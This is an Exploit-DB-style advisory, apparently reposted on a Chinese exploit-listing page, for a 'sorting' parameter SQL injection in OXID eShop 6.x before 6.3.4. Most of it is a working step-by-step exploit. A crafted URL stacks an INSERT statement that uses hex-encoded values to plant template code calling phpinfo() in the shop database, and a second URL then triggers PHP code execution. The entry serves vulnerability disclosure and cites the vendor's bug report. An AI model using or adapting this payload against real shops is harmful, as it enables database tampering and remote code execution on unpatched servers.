OXID eShop 6.3.4 – ‘sorting’ SQL Injection

  • 作者: VulnSpy
    日期: 2020-05-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48527/
  • # Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection
    # Date: 2019-07-29
    # Exploit Author: VulnSpy
    # Vendor Homepage: https://www.oxid-esales.com/
    # Software Link: https://github.com/OXID-eSales/oxideshop_ce
    # Version: Versions 6.x (prior to 6.3.4)
    # Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc
    # CVE:
    
    1. Click on any product item in the web page
    
    ```bash
    e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
    ```
    
    2..Add `sorting` parameter after the URL of item detail ( Insert PHP code
    to database via SQL injection )
    
    ```bash
    e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert
    into
    oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)
    
    VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1,
    0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
    1, 0x76756c6e73707964656d6f,
    0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
    0x434d53464f4c4445525f55534552494e464f, 0x00);%23
    ```
    
    3.Accessing the following links triggers PHP code execution and will
    display the PHPINFO page if exploited successfully.
    
    ```bash
    http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
    ```
    
    Ref:
    * https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
    * https://blog.ripstech.com/2019/oxid-esales-shop-software/
    * https://bugs.oxid-esales.com/view.php?id=7002